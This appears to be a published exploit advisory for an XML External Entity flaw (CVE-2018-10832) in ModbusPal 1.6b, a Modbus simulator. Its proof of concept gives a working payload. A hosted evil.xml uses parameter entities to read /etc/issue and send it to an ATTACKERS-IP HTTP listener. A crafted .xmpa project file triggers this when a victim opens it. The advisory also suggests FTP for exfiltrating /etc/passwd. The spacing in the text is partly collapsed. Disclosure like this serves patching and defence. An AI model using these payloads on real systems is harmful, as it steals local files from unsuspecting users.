[+]ExploitTitle:ModbusPalXXEInjection[+]Date:05-08-2018[+]ExploitAuthor:TrentGordon[+]VendorHomepage: http://modbuspal.sourceforge.net/[+]SoftwareLink: https://sourceforge.net/projects/modbuspal/files/latest/download?source=files
[+]Version:1.6b
[+]Tested on:Ubuntu16.04withJava1.8.0_151[+]CVE:CVE-2018-108321.VulnerabilityDescriptionModbusPal1.6b is vulnerable toanXMLExternalEntity(XXE)attack.Projects are saved as .xmpp files and automations can be exported as .xmpa files, both XML-based and vulnerable toXXEinjection.Sending a crafted .xmpp or .xmpa file toa user, when opened/imported in ModbusPal1.6b, will return the contents of any local files toa remote attacker.2.Proof of Concept
a.) python -m SimpleHTTPServer9999(listening on ATTACKERS-IP and hosting evil.xml)
b.)Contents of hosted "evil.xml"<!ENTITY% data SYSTEM"file:///etc/issue"><!ENTITY% param1 "<!ENTITY exfil SYSTEM 'http://ATTACKERS-IP:9999/?%data;'>">
c.)ExampleExploited"xxe.xmpa"<?xml version="1.0"?><!DOCTYPE r [<!ELEMENT r ANY><!ENTITY% sp SYSTEM"http://ATTACKERS-IP:9999/evil.xml">%sp;%param1;]><r>&exfil;</r><!DOCTYPE modbuspal_automation SYSTEM"modbuspal.dtd"><modbuspal_automation><automation name="temp" step="1.0" loop="true" init="0.0"></automation></modbuspal_automation>3.AdditionalDetailsJava1.7 contains certain defenses against XXE, including throwing a java.net.MalformedURLException when certain characters (such as '/n') are included in a URL.This means that the file exfiltrated in the above attack is limited tosingle line files that dont contain any restricted characters.The above POCuses/etc/issue, which is one of the few common linux files that meets thiscriteria.Exploitation of this vulnerability on later versions of Javarequiresa more creative approach than described above, such as using FTP instead of URLtoexfiltrate/etc/passwd.
